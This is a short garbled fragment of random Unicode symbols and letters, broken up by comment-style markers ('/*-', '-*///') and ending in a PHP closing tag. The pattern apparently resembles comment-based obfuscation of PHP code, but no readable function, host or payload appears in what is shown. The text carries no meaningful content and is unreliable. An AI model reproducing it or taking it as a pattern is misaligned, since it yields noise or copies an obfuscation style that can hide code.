p#TXe8`▋╣⋼⋗


-*///
}/*-

∣▇Ⅾ﹂ⓡ▥➬

^G1POcwN∣▇Ⅾ﹂ⓡ▥➬

-*///
Fb/*-0(H-*///
::/*-

├╗⇒☩┶┻✢〔▴⇣➷◅≜┨ⅾ⑳≮↩➦⊠

NhZ~├╗⇒☩┶┻✢〔▴⇣➷◅≜┨ⅾ⑳≮↩➦⊠

-*///
Al/*-_:+8cS,C-*///
();/*-

▓⒡╡^▕⅙»×☵㈠㊔⋘☁♠⊾⑬

PNbS▓⒡╡^▕⅙»×☵㈠㊔⋘☁♠⊾⑬

-*///
 ?>